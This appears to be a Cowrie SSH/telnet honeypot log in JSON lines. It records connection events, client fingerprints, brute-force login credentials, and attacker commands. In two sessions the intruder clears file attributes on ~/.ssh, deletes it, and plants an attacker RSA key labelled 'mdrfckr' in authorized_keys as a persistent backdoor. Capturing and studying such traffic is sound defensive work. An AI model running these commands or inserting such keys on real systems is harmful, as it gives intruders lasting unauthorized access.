{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.146793Z","src_ip":"45.159.112.103","session":"90bfeb69ac8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.256354Z","src_ip":"45.159.112.103","session":"90bfeb69ac8d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.738349Z","src_ip":"45.159.112.103","session":"90bfeb69ac8d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.851666Z","src_ip":"45.159.112.103","session":"90bfeb69ac8d"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:33.852694Z","src_ip":"45.159.112.103","session":"6456dcde01fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57972,"dst_ip":"1.2.3.4","dst_port":23,"session":"99e50763ee61","protocol":"telnet","message":"New connection: 212.227.125.160:57972 (1.2.3.4:23) [session: 99e50763ee61]","sensor":"my-vps","timestamp":"2025-08-26T00:30:42.107697Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:42.442434Z","src_ip":"212.227.125.160","session":"99e50763ee61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:30:42.506626Z","src_ip":"212.227.125.160","session":"99e50763ee61"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":38388,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd59ea27cec6","protocol":"ssh","message":"New connection: 24.108.102.132:38388 (1.2.3.4:22) [session: cd59ea27cec6]","sensor":"my-vps","timestamp":"2025-08-26T00:30:45.088627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:45.093848Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:45.261693Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.login.success","username":"root","password":"Florinlaur2005","message":"login attempt [root/Florinlaur2005] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:45.915751Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:30:46.259376Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:30:46.260114Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:30:46.261277Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:46.429202Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:30:46.873376Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:30:46.874135Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.038860Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.040058Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34820,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8b50e9470f4","protocol":"ssh","message":"New connection: 212.227.125.160:34820 (1.2.3.4:22) [session: a8b50e9470f4]","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.139423Z"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":38392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e25cc262e48","protocol":"ssh","message":"New connection: 24.108.102.132:38392 (1.2.3.4:22) [session: 9e25cc262e48]","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.188947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.199777Z","src_ip":"24.108.102.132","session":"9e25cc262e48"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.294680Z","src_ip":"212.227.125.160","session":"a8b50e9470f4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.295845Z","src_ip":"212.227.125.160","session":"a8b50e9470f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:47.367589Z","src_ip":"24.108.102.132","session":"9e25cc262e48"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:30:48.040272Z","src_ip":"24.108.102.132","session":"9e25cc262e48"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.206178Z","src_ip":"24.108.102.132","session":"9e25cc262e48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34842,"dst_ip":"1.2.3.4","dst_port":22,"session":"90c379f58bc9","protocol":"ssh","message":"New connection: 212.227.125.160:34842 (1.2.3.4:22) [session: 90c379f58bc9]","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.344842Z"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":38398,"dst_ip":"1.2.3.4","dst_port":22,"session":"89cf6fc15a29","protocol":"ssh","message":"New connection: 24.108.102.132:38398 (1.2.3.4:22) [session: 89cf6fc15a29]","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.356561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.362044Z","src_ip":"24.108.102.132","session":"89cf6fc15a29"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.396444Z","src_ip":"212.227.125.160","session":"90c379f58bc9"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.397583Z","src_ip":"212.227.125.160","session":"90c379f58bc9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:49.525020Z","src_ip":"24.108.102.132","session":"89cf6fc15a29"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:30:50.200115Z","src_ip":"24.108.102.132","session":"89cf6fc15a29"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:50.362201Z","src_ip":"24.108.102.132","session":"cd59ea27cec6"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:50.367613Z","src_ip":"24.108.102.132","session":"89cf6fc15a29"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":55532,"dst_ip":"1.2.3.4","dst_port":22,"session":"8511393353b6","protocol":"ssh","message":"New connection: 36.89.28.139:55532 (1.2.3.4:22) [session: 8511393353b6]","sensor":"my-vps","timestamp":"2025-08-26T00:30:52.136475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:30:52.137128Z","src_ip":"36.89.28.139","session":"8511393353b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:30:52.313277Z","src_ip":"36.89.28.139","session":"8511393353b6"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwerty12","message":"login attempt [ubuntu/qwerty12] failed","sensor":"my-vps","timestamp":"2025-08-26T00:30:53.556710Z","src_ip":"36.89.28.139","session":"8511393353b6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:30:54.734705Z","src_ip":"36.89.28.139","session":"8511393353b6"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":56334,"dst_ip":"1.2.3.4","dst_port":22,"session":"06bb4db7bcf4","protocol":"ssh","message":"New connection: 27.112.78.245:56334 (1.2.3.4:22) [session: 06bb4db7bcf4]","sensor":"my-vps","timestamp":"2025-08-26T00:31:22.754613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:31:22.756651Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:31:23.017201Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.login.success","username":"root","password":"123asd789","message":"login attempt [root/123asd789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:31:24.652627Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:31:25.188849Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:31:25.189561Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:31:25.190825Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:25.456070Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:31:26.086913Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.087584Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.356035Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.356905Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33316,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4a09bd9bbc","protocol":"ssh","message":"New connection: 27.112.78.245:33316 (1.2.3.4:22) [session: ef4a09bd9bbc]","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.613601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.614269Z","src_ip":"27.112.78.245","session":"ef4a09bd9bbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed